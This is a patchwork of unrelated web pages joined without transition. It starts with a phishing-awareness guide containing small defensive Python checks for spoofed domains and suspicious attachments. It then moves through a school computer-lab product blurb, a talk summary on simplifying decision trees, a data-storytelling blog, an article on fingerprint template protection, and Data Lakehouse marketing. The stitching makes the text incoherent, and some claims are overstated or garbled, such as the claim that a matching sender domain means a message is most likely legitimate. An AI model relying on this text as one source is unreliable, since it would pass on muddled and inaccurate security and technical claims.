What do virtually all Phishing Emails have in common? By understanding what Phishing Emails have in common, you can quickly identify them and avoid these threats.
What is phishing?
Phishing is a method used by hackers to collect personal information using deceptive e-mails and websites. It’s a form of attack that uses disguised email as a weapon.
The main objective is to trick the target into believing that the message is legitimate. It could be crafted to look like a note from a senior employee within their firm. Sometimes it is made to look like a request from their bank. It may direct the victim to download an attachment or to click a link.
However, phishing emails have distinctive characteristics and can be easily identified by someone who is well informed about this kind of cyber-attack.
In most cases, phishing emails appear to be from a real person, a trusted entity, or a company with which the target is likely to do business.
Phishing attacks are one of the oldest techniques used in cyberattacks, dating back to the 1990s. Despite being in existence for quite some time, phishing attacks are becoming more sophisticated and sinister as technology develops at a rapid rate.
Phishing is still one of the most widespread and most exploited techniques by black-hats, especially during crises such as SARS or COVID-19.
In this article, we will address some of the striking similarities between various phishing emails. We will look at multiple types of phishing attacks, describe the most commonly exploited vulnerabilities, and show how to position your company or yourself against such security incidents.
A phishing kit is a collection of software tools that makes it easier for people with little or no technical skills to execute an attack. A typical phishing kit is made of website development software with a simple, low/no-code graphical user interface (GUI).
The phishing kit comes complete with graphics, sample scripts, and email templates that an attacker can readily use to create legitimate-looking correspondence. Some phishing kits come along with telephone numbers, a list of vulnerable e-mail addresses, and various software to automate the malware distribution process.
Types of phishing
One thing that all phishing emails have in common is the disguise. Attackers cover their email address so that it looks like it’s coming from a legitimate user. Or, they create fake websites that look like legitimate ones trusted by the target. In some cases, they use foreign character sets to disguise URLs.
With that in mind, we can classify various forms of attack as phishing attacks. Classification can be done in several ways, including by the purpose of the phishing attempt, the intrusion technique, etc. Generally, phishing emails aim at one of two things:
- Trick the victim into handing over sensitive information, often a username and a password, with which the attacker can easily breach a system or account.
- Trick the victim into downloading malware. In this case, an attacker aims to deceive the target into infecting their own computer by installing malware or a remote access Trojan. For instance, a phishing email may be sent to an HR officer with an attachment that claims to be a job seeker's resume. Such attachments are mostly .zip files or Microsoft Office documents embedded with malicious code or links.
1. Email Phishing
Most phishing attacks are sent via email. In this technique, the hacker sets up a fake domain that mimics a genuine organization and then sends lots of generic requests to identified targets through the mail. A common fraudulent substitution involves placing characters such as 'r' and 'n' next to each other ('rn') so that they appear as 'm'. In some cases, the crooks may decide to use the organization's name in the domain, such as email@example.com, hoping that it will appear as ALIBABA in the target's inbox.
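The 'rn'-for-'m' trick described above can be checked mechanically by normalizing lookalike character sequences before comparing domains. A minimal sketch; the substitution table and trusted-domain list are illustrative, not a real blocklist:

```python
# Illustrative check for the "rn"-for-"m" trick. This simple approach assumes
# the trusted domains themselves contain none of the lookalike sequences.
LOOKALIKES = {"rn": "m", "vv": "w", "0": "o", "1": "l"}

def normalize(domain):
    """Collapse common lookalike sequences so a spoofed domain
    normalizes to the brand it imitates."""
    result = domain.lower()
    for fake, real in LOOKALIKES.items():
        result = result.replace(fake, real)
    return result

def looks_spoofed(sender_domain, trusted_domains):
    """True if the domain is untrusted but normalizes to a trusted one."""
    if sender_domain in trusted_domains:
        return False
    return normalize(sender_domain) in trusted_domains

trusted = {"amazon.com"}
print(looks_spoofed("arnazon.com", trusted))  # True: "rn" renders like "m"
print(looks_spoofed("amaz0n.com", trusted))   # True: zero in place of "o"
print(looks_spoofed("amazon.com", trusted))   # False: the genuine domain
```

Real mail filters use far richer homoglyph tables (including Unicode confusables), but the principle is the same.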
There are several ways to spot a phishing email, and by the end of this article, you should be able to spot one quickly. You will also be able to guide others to identify Phishing emails.
As a general rule, always check and carefully scrutinize the email address of a message asking you to click a link or download an attachment.
2. Whaling
Whaling attacks target senior executives. Despite having the same goal as any other form of phishing attack, whaling attacks tend to be more subtle.
Because the technique is used on high-profile individuals within an organization, the methodology does not employ fake links and malicious URLs in breaching a system.
There have been increasing cases of whaling attacks across various sectors involving bogus tax returns in the recent past. Tax forms are valuable to hackers: they contain a wealth of important information such as social security numbers, addresses, bank account information, and the targeted individual's full legal name.
3. Vishing and Smishing
When using either vishing or smishing techniques to hack a target, telephones replace emails as the primary communication method.
In smishing attacks, a cybercriminal sends phishing texts to a target via SMS. The message is drafted and tuned just as an email would be; the objective is to convince the victim that the message is from a legitimate or trusted source.
In vishing attacks, the cyber-criminal deceives their target through an actual phone call.
One of the common tricks used by hackers to execute a vishing attack is posing as a fraud investigator. The attacker may claim to be from a card company or a bank and pretend to inform the target about accounts that have been breached.
4. Spear Phishing
Spear phishing is a sophisticated method of attack involving email. This technique is used to breach a specific person. Cyber-criminals who exploit their targets through this technique already have some information about them, such as:
- Name and physical address
- Place of employment
- Job title
- Specific information about their job duties
- Email address
One of the most detrimental phishing attacks ever carried out, the hacking of the Democratic National Committee, was accomplished with the aid of spear phishing. The first round of attacks involved sending emails containing malicious links to more than 1,000 email addresses. The second wave of the attack led a large share of the committee's members to share their passwords.
5. Angler Phishing
Social media platforms have given hackers a new attack vector. There are various fake URLs, tweets, cloned websites, instant messaging techniques, and posts that can be used to persuade people to download malware or divulge sensitive information.
For instance, Elon Musk and Bill Gates are among the high-profile users whose Twitter accounts have recently been used to spark attacks. The latest one used Bitcoin and a message convincing targets to give back to society.
Data willingly posted by people can also be used to create highly targeted attacks. In 2016, a group of hackers conducted a sophisticated attack through Facebook. Facebook users received messages, initiated by the cyber-criminals, informing them that they had been mentioned in a post. Clicking the link installed malware or a Trojan on their personal computers. In the second phase of the attack, the hackers used the compromised web browser to access the victim's Facebook account. They managed to control various accounts, steal important data, and spread the infection to victims' friends through their accounts.
What do Virtually all Phishing Emails have in Common?
1. The message is sent from a public email domain
No legitimate organization sends emails from an address that ends in '@gmail.com'; not even Google uses such addresses. Most organizations, even small ones, have their own domain and company email accounts. For instance, Google is most likely to use '@google.com' when sending legitimate emails to its clients. Therefore, if the sender's domain matches the organization's own domain, the message is most likely legitimate.
You can always verify an organization's domain name by typing the company's name into a reliable search engine. This makes it simple to detect most phishing emails. However, cybercriminals are growing more advanced, so detecting these intruders requires extra vigilance.
An important tip to note: look at the email address and not just the sender.
Below is a phishing mail mimicking PayPal. Most crooks can create bogus email addresses and even select a display name that does not relate to the email in any way.
This is a nearly flawless scam email. It is professionally styled and believable, and it uses PayPal's logo at the top of the message, making it undetectable to an 'ignorant' target. However, there's a huge red flag: the sender's address is noted as 'firstname.lastname@example.org' instead of an address with the organization's name in the domain (for instance, '@paypal.com') to indicate that it came from someone at PayPal.
Most hackers exploit their targets' ignorance; in many cases, the mere inclusion of a known company name anywhere in the message is enough to trick people. The targeted individual may glance at the word PayPal in the email address and be satisfied. Some may not even differentiate between the domain name and the local part of the address.
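The advice above (inspect the actual address, not just the display name) can be automated in a few lines. A rough sketch; the brand-to-domain mapping and helper names are illustrative assumptions, not a complete policy:

```python
from email.utils import parseaddr

# Illustrative brand-to-domain mapping; a real filter would use a much
# larger, maintained list.
EXPECTED = {"paypal": "paypal.com", "google": "google.com"}

def sender_domain(from_header):
    """Return the domain of the address in a 'From:' header, if any."""
    _, addr = parseaddr(from_header)
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else None

def flag_mismatch(from_header):
    """Flag messages that mention a known brand but are sent from a
    domain that does not belong to that brand."""
    domain = sender_domain(from_header)
    lowered = from_header.lower()
    for brand, real_domain in EXPECTED.items():
        if brand in lowered and domain != real_domain:
            return f"'{brand}' mentioned, but the address is @{domain}"
    return None

print(flag_mismatch("PayPal Support <service@paypal-accounts.net>"))
# -> 'paypal' mentioned, but the address is @paypal-accounts.net
print(flag_mismatch("PayPal <service@paypal.com>"))  # -> None
```

Note how the display name ("PayPal Support") is ignored entirely; only the domain after the '@' decides the verdict.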
2. They are poorly written emails with an odd writing tone
Poor spelling and grammar should always be a first red flag for any email received, whether from a known or unknown source. Some people believe such errors arise from an inefficient "filtering system"; in reality, hackers use this technique to select only the most gullible targets. The catch is that if an individual cannot pick up on the minor hints at the first stage of the intrusion, then most likely they won't pick up on clues during the scammer's endgame.
When executing a phishing attack, hackers do not have to monitor inboxes and send tailored responses. To reach a wider audience and lure more victims, they prefer randomly dumping thousands of crafted messages on unsuspecting persons.
Important tip: look for grammatical errors and not spelling mistakes.
In most cases, hackers will use a machine translation tool or spellchecker when crafting phishing messages. These tools can produce correctly spelled words with accuracy close to 100%, but they do not necessarily arrange the words in the proper context.
For example, the image shown above is a phishing scam imitating Windows. Every word is spelled correctly, but there are various minor grammatical errors that a native English speaker wouldn't make, such as "We detected something unusual to use an application." There are also missing words in various sentences, such as "Please contact Security Communication Center" and "a malicious user might trying to access."
Everyone makes typing mistakes from time to time, especially when in a hurry; however, you should thoroughly scrutinize any error to judge whether it's a clue to something more sinister.
3. There are suspicious attachments or links
Phishing attacks are launched in various forms. Although this article has focused mainly on email phishing, scammers can also use phone calls, social media posts, and text messages.
However, regardless of the channel or technique through which phishing messages are delivered, they will always contain a payload: a link to a bogus website, or an infected attachment you are prompted to download.
An infected attachment, in this case, is any document that contains malware. Below is an ideal example of a phisher claiming to send an invoice.
From the above image, it's impossible for the recipient to know what the message entails until they open the attachment, whether or not they were expecting an invoice from the sender. Upon opening it, the receiver may realize that the message is not intended for them, but by then it will be too late: the malware will already have been unleashed on their computer.
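A mail gateway can apply the same suspicion to attachments before a human ever opens them. A toy triage sketch, based on the risky formats this article mentions (.zip archives and Office documents); the extension lists are illustrative, not a complete policy:

```python
# Illustrative attachment triage. Real gateways also inspect file contents
# (magic bytes, macros), not just names.
RISKY_EXTENSIONS = {".zip", ".docm", ".xlsm", ".exe", ".js", ".iso"}
DOUBLE_EXTENSIONS = (".pdf.exe", ".doc.exe", ".jpg.exe")

def triage_attachment(filename):
    """Classify an attachment name as allow / warn / quarantine."""
    name = filename.lower()
    if name.endswith(DOUBLE_EXTENSIONS):
        return "quarantine: double extension disguising an executable"
    for ext in RISKY_EXTENSIONS:
        if name.endswith(ext):
            return f"warn: '{ext}' attachments are a common malware carrier"
    return "allow"

print(triage_attachment("Invoice_2023.pdf.exe"))  # quarantine: ...
print(triage_attachment("resume.zip"))            # warn: '.zip' ...
print(triage_attachment("notes.txt"))             # allow
```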
4. There’s a sense of urgency, or the message calls for prompt action.
Hackers are aware that most human beings are procrastinators: despite the significance of a message, most people will decide to deal with it later.
It is human nature that the more you think about something, the more likely you are to notice that something is off. Maybe later in the day you realize that the organization in question doesn't usually contact you at that address, or perhaps you realize that your colleagues at work did not receive the same email. Even if you don't get the "Aha!" moment, reading the message with fresh eyes might unveil its true nature.
For these reasons, most phishing emails demand that you act immediately or the chance will be gone, a trait that is evident in almost every example we've used above.
Below is a typical example:
Such phishing scams are sinister and dangerous at the same time, since they jeopardize the recipient's (possibly a junior employee's) position at work.
5. They have Oddly Generic Greetings
Phishing scammers target millions of people and therefore send out huge volumes of phishing emails every day. With this workload, they rely heavily on phishing tools and applications to generate message templates, so greetings tend to be generic, such as "Dear Customer," supposedly from "your company" or "your bank." A genuinely sensitive email of this kind should contain more details about you, since it would originate from someone who knows you: a partner you've met before, or a colleague you once worked with.
Educate your employees to prevent phishing
Education is power, and knowledge liberates. Regularly remind your employees of what they should look for when handling emails or information within the organization. This does not necessarily mean frequent awareness training programs; a few well-placed posters within the office can serve the purpose.
Information and Communication Technology (ICT) has infiltrated global classrooms at an exceedingly rapid pace. Computers form an integral part of the modern-day learning environment, offering cutting-edge software and classroom management tools that have led to improved student learning and better instructional techniques. On one hand, this has helped educators increase student participation and achievement. On the other hand, such heavy reliance on computer-aided learning has made 100% computer availability a necessity in a digital classroom setting.
This whitepaper discusses the various IT challenges that system administrators managing computer labs at schools and colleges encounter. It also highlights how a Reboot to Restore technology can help school administrators to create an open and unrestricted learning environment for students with minimal efforts.
Learn more about this non-restrictive technology and its benefits in education.
Stuart Crawford from Fair Isaac’s R&D group presented on New Approaches to Creating, Simplifying and Visualizing Rules. While decision trees can be very clear, they can also become very complex. His group has been working on algorithms for simplifying decision trees. Because decision trees often have repeating sub-trees – pieces of the tree that are identical but in different paths – a Directed Action Graph is often much simpler. The graph can re-use the logic by linking to it in multiple ways. Building one of these requires some fairly complex math to find the right nodes and ordering.
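The tree-to-DAG reduction rests on one observation: structurally identical sub-trees can be stored once and referenced many times. A toy sketch of the size win (the tuple encoding and rule names are invented for illustration, not Fair Isaac's actual algorithm):

```python
# Toy decision structures as nested tuples:
#   ("action", name)          -- leaf
#   ("node", test, yes, no)   -- internal test node
# Because tuples compare by value, a `seen` set merges structurally
# identical sub-trees, which is exactly the tree -> DAG reduction.

def tree_nodes(node):
    """Node count when repeated sub-trees are stored separately (a tree)."""
    if node[0] == "action":
        return 1
    _, _test, yes, no = node
    return 1 + tree_nodes(yes) + tree_nodes(no)

def dag_nodes(node, seen=None):
    """Node count once identical sub-trees are shared (a directed graph)."""
    if seen is None:
        seen = set()
    if node in seen:
        return 0
    seen.add(node)
    if node[0] == "action":
        return 1
    _, _test, yes, no = node
    return 1 + dag_nodes(yes, seen) + dag_nodes(no, seen)

approve = ("action", "approve")
review = ("action", "review")
shared = ("node", "income > 50k", approve, review)  # appears twice below
tree = ("node", "age > 25", shared,
        ("node", "has_collateral", shared, review))
print(tree_nodes(tree), dag_nodes(tree))  # 9 5
```

Even in this tiny example the repeated sub-tree nearly halves the node count; on real trees with thousands of nodes, the effect compounds.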
While these are simpler they can still be complex so the next step is to develop what is known as an Exception-based Directed Action Graph or EDAG. This takes the most common outcome and puts it at the top and then only has nodes for the other paths. In other words the action at the top is the default.
However, this is not always enough. He showed an example of a 492-node decision tree reduced to 89 nodes in an EDAG, and a 30,000-node (!) tree from a bank reduced to a 480-node graph. These are clearly simpler, but still not simple.
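The exception-based idea (promote the most common action to an implicit default and keep explicit nodes only for the exceptions) can be illustrated on a flat rule list; this is a deliberate simplification of the real graph transformation, with invented rules:

```python
from collections import Counter

def exception_form(rules):
    """rules: list of (condition, action) pairs. Returns the default action
    plus only the rules whose action differs from it."""
    actions = Counter(action for _, action in rules)
    default = actions.most_common(1)[0][0]
    exceptions = [(cond, act) for cond, act in rules if act != default]
    return default, exceptions

rules = [
    ("score < 600", "decline"),
    ("income < 20000", "decline"),
    ("recent_bankruptcy", "decline"),
    ("score >= 600 and income >= 20000", "approve"),
]
default, exceptions = exception_form(rules)
print(default)     # decline
print(exceptions)  # [('score >= 600 and income >= 20000', 'approve')]
```

Three of the four rules collapse into the implicit default, which is the same intuition that shrinks a large tree into a much smaller EDAG.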
An Action Graph is the next simplification – take an action and find all the logic that could result in that action. This becomes a single action graph. Complex trees and graphs can have many of these action graphs extracted from them and each is focused and easy to read.
Of course, you could author this way in the first place. Each action graph can be built separately, with its own ordering and variables. Once you have the individual fragments, you can merge them into a single decision tree or EDAG. The action graphs can be stitched together, but building them separately creates the potential for errors. They can overlap (two paths in different graphs that cover the same case but lead to different actions) or have gaps (certain values not covered by any of the action graphs). Unless you can manage these overlaps and gaps, you cannot use the individual graphs for development.
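Overlaps and gaps between separately authored action graphs can be detected by sweeping a sample of the input space and checking that exactly one action fires for each point. A sketch with invented predicates (a real tool would reason over the conditions symbolically rather than by sampling):

```python
def check_action_graphs(action_predicates, sample_inputs):
    """action_predicates: {action: predicate(x) -> bool}.
    Returns inputs covered by no action (gaps) and inputs claimed by
    more than one action (overlaps)."""
    gaps, overlaps = [], []
    for x in sample_inputs:
        hits = [a for a, pred in action_predicates.items() if pred(x)]
        if not hits:
            gaps.append(x)
        elif len(hits) > 1:
            overlaps.append((x, hits))
    return gaps, overlaps

graphs = {
    "approve": lambda score: score >= 700,
    "review": lambda score: 600 <= score <= 700,   # overlaps approve at 700
    "decline": lambda score: score < 590,          # leaves 590-599 uncovered
}
gaps, overlaps = check_action_graphs(graphs, range(550, 800, 5))
print(gaps)      # [590, 595]
print(overlaps)  # [(700, ['approve', 'review'])]
```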
Finally this approach allows you to generate comparisons between trees. Instead of showing structural differences, which can be confusing, logical differences can be shown as an EDAG. Much simpler.
I saw Stuart present this technology before and blogged it here.
One of the things I'm really passionate about is data and how it can be used to influence decision-making. But everyone has their own personal biases and opinions that they use to create a narrative and this can affect how they look at data. So even when the data tells us one thing, we may see something completely different.
For example, I recently read an article which looked at what people actually die from in the US compared to what they search for on Google and what the media talks about. This showed that the number of people who die from terrorism or homicide is negligible compared to those who die from heart disease and cancer. But terrorism and homicide are what the media focus on in almost 50% of their coverage. Based on the media-driven narrative we’re fed, it’s very easy to believe that we’re living in a disaster zone, which is simply not the case.
I saw another example of how narratives can lead people to ignore the data recently when watching the federal election in Australia. From the moment the first few votes trickled in, it was clear who was going to win the election. But it was fascinating to see how the newsroom commentators clearly didn’t believe the data because they had already built up a narrative in their minds about the way it was going to go. So they were waiting for the data to magically change and it didn’t.
The reality is that statistics don't work that way - a small sample can tell you a lot about what the end result will be.
To me, these two examples encapsulate the problems that organizations have when it comes to believing personal opinion about what's happening in the business rather than the cold hard facts. Leaders in an organization need to take a step back and look at what the data is telling them about what's going on. They need to challenge the dominant narrative and focus on what the numbers are actually saying.
By continually questioning the narrative, you can see what’s really happening rather than what you think is happening. This is how you can make a real impact on your organization. If the government and media did this, then their narrative would focus on heart disease and cancer rather than terrorism and homicide and we would have a better chance of saving our loved ones.
Data Storytelling: How to Use Data Insights to Drive Action
If you want to know how to tell an accurate data story that compels people to action, download your free guide to data storytelling.
By: Afeeza Ali and Surya Prakash
Modern user authentication and verification systems have been revolutionized ever since the biological properties of individuals became a part of identity management systems. The usage of intrinsic physiological or behavioural characteristics relieves an individual of remembering cumbersome passwords or tokens. Additionally, the usage of biometrics has rendered the duplication of a user's identity more difficult than ever before. Although the involvement of biometric information has provided immense ease of use and effectiveness, its mismanagement and inefficient deployment may potentially cause permanent non-usability of an individual's biometrics. Therefore, non-repudiation and the unique nature of biological features have made it imperative to ensure absolute resistance to compromise. Consequently, although there have been various studies proposing techniques that improve recognition performance and strengthen the security of original biometric data, a number of challenges remain under the scope of research.
Fingerprint authentication, face, iris and retina, keystroke dynamics, voice recognition, etc. are a few of the most prominently used biometrics for various applications worldwide. Among these, fingerprint biometric is the most popular means of user verification employed across popular biometric security applications including forensics, e-commerce, citizens’ registration applications used by governments, border control, etc. Fingerprint-based identification systems are largely used owing to the innate ease in collection and availability of multiple sources (10 fingers) for acquisition.
Fingerprints and Minutiae points
Patterns made by a collection of high peaking lines (ridges) and the space between these lines appearing as low shallow portions (valleys) on the surface of a fingertip represent a fingerprint. Ridge ending and ridge bifurcation are two of the most important minutia features of ridges. A ridge ending is a location where a singular ridge discontinues abruptly. A ridge bifurcation is a location where two ridges unite to form a single continuous ridge. Distinctive discontinuities in the ridge lines such as these are known as minutiae points. Fingerprint identification relies primarily on these minutiae points.
A fingerprint can be reconstructed if there is a leakage of precise information of minutiae points. This leads to the idea of securing raw fingerprint data by designing a one-way transformation of original minutiae points so that a possible compromise of the database can be mitigated by a reissuance of the accorded template. This is the key idea behind one of the most popular means of biometric template protection i.e., cancellable biometrics which employ the following steps.
- A digital image of a fingerprint is obtained at the sensor end and appropriate techniques are applied to extract the minutiae points.
- Unique, discriminatory features are computed from the minutiae points that form a unique fingerprint template corresponding to its original biometric data.
- The template generated is irreversibly transformed in a manner that any degradation suffered does not affect the matching process adversely. This secure template is safely stored in the database.
- A probe template is transformed similarly and is matched (in the transformed domain) with the previously stored templates to validate the ingenuity.
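The enroll-and-match flow above can be sketched with a toy, BioHashing-style transform: a user-key-seeded random projection followed by binarization. Everything here (the featurization, key derivation, dimensionality, and threshold) is an illustrative assumption, not a production template-protection scheme:

```python
import hashlib
import random

def cancellable_template(minutiae, user_key, bits=16):
    """Project a minutiae-derived feature vector through a random matrix
    seeded by a revocable user key, then binarize. A compromised template
    can be revoked by re-enrolling with a new key, which yields a fresh,
    unlinkable template from the same finger."""
    features = [value for point in minutiae for value in point]
    seed = int.from_bytes(hashlib.sha256(user_key.encode()).digest()[:8], "big")
    rng = random.Random(seed)
    template = []
    for _ in range(bits):
        weights = [rng.uniform(-1.0, 1.0) for _ in features]
        projection = sum(w * f for w, f in zip(weights, features))
        template.append(1 if projection >= 0 else 0)
    return template

def verify(stored, probe, threshold=0.85):
    """Match in the transformed domain via Hamming similarity."""
    agreement = sum(a == b for a, b in zip(stored, probe))
    return agreement / len(stored) >= threshold

# Each minutia as (x, y, orientation); the values are made up.
minutiae = [(12, 40, 0.6), (55, 23, 1.9), (33, 71, 2.4)]
stored = cancellable_template(minutiae, "user-key-v1")
print(verify(stored, cancellable_template(minutiae, "user-key-v1")))  # True
# After a database compromise, revoke "user-key-v1" and re-enroll:
reissued = cancellable_template(minutiae, "user-key-v2")
```

Matching happens entirely in the transformed domain, so the stored bits reveal neither the raw minutiae nor the key.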
Several fingerprint template protection schemes, among others, have been proposed recently that incorporate the above-mentioned procedures and offer solutions to various new challenges in the scope of fingerprint biometrics.
Open challenges in fingerprint authentication:
Although fingerprints have remained dominant among biometric-based authentication systems in terms of convenience and low error rates, a steady increase in their deployment across various environments presents new challenges.
The first and most critical step in automated fingerprint authentication technologies is the acquisition of raw data. The quality of the fingerprint image substantially affects the overall system performance. However, acquiring precise, high-quality impressions is a challenging job owing to physical distortion and translation/rotation while capturing the digital image of a fingerprint. Handling low-quality and partial/arch-type fingerprints still needs work to ensure that the system performs satisfactorily.
The possibility of fingerprint reconstruction from minutiae information negates the feasibility of storing raw minutiae points as a biometric template. Consequently, several biometric protection schemes put forth ways to replace the biometric data by applying a suitable transformation that is unique to a user without affecting recognition performance. Nonetheless, it remains a challenge for the biometric research community to fully quantize the information obtained from original data and produce an absolutely irreversible template that gives away no information about the original minutiae points it was constructed from. If template non-invertibility is not achieved, it is a significant threat to the user's identity.
Rampant use of biometrics in multifaceted applications has increased the risk of identity theft significantly. The past decade has seen a surge in malicious attempts at identity fraud by forging biometrics. For instance, dummy fingerprints constructed using gelatine, clay, and silicone molds are common means of spoof attacks used by identity forgers. Existing spoof detection methods suffer from a bottleneck of low accuracy rates.
As a result, designing an algorithm that encompasses all the discussed challenges and more arguably stands as the biggest challenge among researchers studying human independent recognition systems.
Scope of future research for fingerprint authentication
Increasing penetration of fingerprint technology for high-security transactions in the market opens up the scope of research in the area that needs renewed attention to the recent challenges. Following are some of the buzzing areas that need research attention:
- Design of anti-spoof algorithms that detect fingerprint forgery or any other presentation attacks along with ensuring low error rate in recognition.
- Incorporating image processing techniques that offer enhanced image quality to facilitate high-quality feature extraction. This can help handle partial/arch type, low-quality input images.
- Design of rotation/translation invariant and alignment-free feature extraction algorithms.
- Design of techniques that employ many-to-one feature mapping to ensure non-invertibility of stored templates.
- Development of algorithms that fully quantize raw templates to allow perfect distortion of minutiae distribution and yet retain the discriminative property.
- Development of secure non-invertible template generation techniques with lesser computation cost and higher performance.
Baghel Vivek Singh, Syed Sadaf Ali, and Surya Prakash. “A non‐invertible transformation-based technique to protect a fingerprint template.” IET Image Processing, 2021. DOI: https://doi.org/10.1049/ipr2.12130
Sandhya, Mulagala, and Munaga VNK Prasad. “Biometric template protection: A systematic literature review of approaches and modalities. Biometric Security and Privacy, pp. 323-370, 2017.
Ali, Syed Sadaf, Iyyakutti Iyappan Ganapathi, and Surya Prakash. “Robust technique for fingerprint template protection.” IET Biometrics, 7(6), pp. 536-549, 2018.
Ali, Syed Sadaf, and Surya Prakash. “3-Dimensional secured fingerprint shell.” Pattern Recognition Letters, 126, pp. 68-77, 2019.
Ali, Syed Sadaf, Iyyakutti Iyappan Ganapathi, and Surya Prakash. “Fingerprint Shell with impregnable features.” Journal of Intelligent & Fuzzy Systems 36(5), pp 4091-4104, 2019.
Jain, Anil K., Karthik Nandakumar, and Abhishek Nagar. “Fingerprint template protection: From theory to practice.” Security and privacy in Biometrics. Springer, London, pp. 187-214, 2013.
Win, Zin Mar, and Myint Myint Sein. “Texture feature-based fingerprint recognition for low quality images.” 2011 International Symposium on Micro-Nano Mechatronics and Human Science, IEEE, 2011.
Cappelli, Raffaele, et al. “Fingerprint image reconstruction from standard templates.” IEEE transactions on pattern analysis and machine intelligence, 29(9), pp. 1489-1503, 2007.
Feng, Jianjiang, and Anil K. Jain. “Fingerprint reconstruction: from minutiae to phase.” IEEE transactions on pattern analysis and machine intelligence, 33(2), pp. 209-223, 2010.
Uliyan, Diaa M., Somayeh Sadeghi, and Hamid A. Jalab. ‘Anti-spoofing method for fingerprint recognition using patch based deep learning machine.’ Engineering Science and Technology, an International Journal, 23(2), pp. 264-273, 2020.
Cite this article:
Afeeza Ali and Surya Prakash (2021) Biometric Fingerprint Authentication: Challenges and Future Research Directions, Insights2Techinfo, pp1
Driven by Big Data and cost-effective cloud storage, the hype around Data Lake as an alternative to traditional data warehouse systems gained steam and promised to capture the value of large and complex data assets at scale. In practice, however, Data Lakes quickly turned into data swamps where data from all sources is dumped with minimal regard for data governance best practices.
Similarly, the schema-on-write construct used to build rigid database models with traditional data warehouse systems also fails to meet the needs of modern Big Data applications. The vast volume, velocity, and variety of Big Data make it challenging to model all information assets in a unified and structured format. And without following an adequate data governance framework, data quality remains elusive, especially as the data is managed and retained in silos and organizations fail to achieve a holistic enterprise-wide view of all of their Big Data assets.
The Open Alternative: What is Data Lakehouse?
Data Lakehouse refers to a new architecture pattern that emerged as an alternative to traditional data warehouse and Data Lake technologies, promising an optimal tradeoff between the two approaches to storing big data. Data Lakehouse is primarily based on open and direct-access file formats such as the Apache Parquet, supports advanced AI/ML applications, and is designed to overcome the challenges associated with the traditional Big Data storage platforms.
The following limitations of Data Warehouse and Data Lakes have driven the need for an open architectural pattern that takes the data structures, management, and quality features from Data Warehouse systems and introduces them to the low-cost cloud storage model employed by the Data Lake technology:
- Lack of Consistency: Maintaining data consistency in Data Lake and Data Warehouse systems is costly and time-consuming, especially when sourcing large data streams from various sources. For instance, a failure at a single ETL step will likely introduce data quality issues that cascade across the Big Data pipeline.
- Slow Updates and Data Staleness: Storage platforms built on the Data Warehouse architecture suffer from data staleness when frequently updated data takes days to load. As a result, IT is forced to make real-time decisions on (relatively) outdated data in a market landscape where proactive decision-making and the agility to act are key competitive differentiators.
- Data Warehouse Information Loss: Data Warehouse systems maintain a repository of structured databases, but the intense focus on data homogenization negatively affects data quality. Converging all data sources into a single unified format often results in the loss of valuable data due to incompatibility, lack of integration, and the dynamic nature of Big Data.
- Data Lake Governance and Compliance Challenges: Data Lake technology addresses the rigidity of schema-on-write by transitioning to the schema-on-read model, which allows you to maintain a repository of raw, heterogeneous data in multiple formats without a strict structure. But while the stored information is largely static, external demands to update or delete specific data records are a real challenge for Data Lake environments. There's no easy way to change reference data, or to index and update a data record within the Data Lake, without first scanning the entire repository, even though such updates and deletions may be required by compliance laws such as the CCPA and GDPR.
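Lakehouse-style table formats tackle exactly this record-level delete problem by appending a delete action to a transaction log rather than rewriting the whole repository. Below is a toy, stdlib-only sketch of the idea; it is not any real format's on-disk layout:

```python
# Toy transaction log: each entry either adds a row or deletes by key.
# Real table formats (e.g. Delta Lake, Apache Iceberg) persist a similar
# log of actions; readers replay it to get the current table state.
log = [
    ("add", {"id": 1, "email": "a@example.com"}),
    ("add", {"id": 2, "email": "b@example.com"}),
]

def delete_record(log, key):
    # GDPR/CCPA-style erasure request: an O(1) append to the log,
    # not a scan-and-rewrite of the whole repository.
    log.append(("delete", key))

def current_state(log):
    rows = {}
    for action, payload in log:
        if action == "add":
            rows[payload["id"]] = payload
        else:  # "delete" carries the key to remove
            rows.pop(payload, None)
    return list(rows.values())

delete_record(log, 2)
print(current_state(log))  # only id 1 remains visible to readers
```

In real systems a later compaction step physically rewrites the underlying files so the deleted records are truly erased, which is what the regulations ultimately require.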
Data Lakehouse Reference Architecture
The Data Lakehouse architecture offers the following key capabilities to address the limitations associated with Data Lakes and the traditional Data Warehouse systems:
- Schema Enforcement and Evolution allows users to control the evolving database structures and data quality issues.
- Ready for Structured and Unstructured Data supports a wider choice of data management strategies, letting users choose among schemas and models based on the application.
- Open Source Support and Standardization ensures compatibility and integration with multiple platforms.
- Decoupled from the Underlying Infrastructure allows IT to build a flexible, composable cloud infrastructure and provision resources for dynamic workloads without breaking the applications running on it.
- Support for Analytics and Advanced AI Applications to run directly from the Data Lake instead of reformulating copies of information in a data warehouse.
- Optimal Data Quality: Atomicity, Consistency, Isolation, and Durability (ACID) compliance previously available in the Data Warehouse systems ensures data quality as new data is ingested in real-time.
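The ACID guarantee in the last point is typically built on a simple primitive: write the new table version somewhere private, then publish it with a single atomic operation. A minimal sketch of that commit pattern using an atomic file rename (a stand-in for the log commits real table formats use):

```python
import json
import os
import tempfile

def atomic_commit(path: str, rows: list) -> None:
    # Write the new table version next to the target, then atomically
    # swap it in: readers see either the old state or the new one,
    # never a half-written file.
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".")
    with os.fdopen(fd, "w") as f:
        json.dump(rows, f)
    os.replace(tmp, path)  # atomic rename on POSIX and Windows

workdir = tempfile.mkdtemp()
table = os.path.join(workdir, "table.json")
atomic_commit(table, [{"id": 1}])
atomic_commit(table, [{"id": 1}, {"id": 2}])
with open(table) as f:
    print(json.load(f))  # the latest fully committed version
```

A crashed writer leaves only an orphan temp file behind; it never corrupts the published table, which is the essence of the atomicity and durability half of ACID.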
The Data Lakehouse Case Example
We recently worked with a large biotech company struggling to manage an on-premise traditional Oracle-based data platform. The company could not scale new use cases for machine learning teams as new information sources were added, leading to siloed information assets and inadequate data quality.
Following an in-depth 8-week assessment and multiple workshops to understand the company’s true business requirements and Big Data use cases, Mactores worked with their business and IT teams to transform their existing data pipeline and incorporate an advanced Data Lakehouse solution. Post-implementation, the result was a 10x gain in DataOps agility and a 15x improvement for machine learning applications, as teams spent less time fixing data quality issues and more time building business-specific ML use cases. Additionally, the business teams now have access to self-service platforms to create custom workflows and process new datasets critical to their business decision-making, all independent of the IT team.
Your Data Lakehouse Strategy for the Long-Term
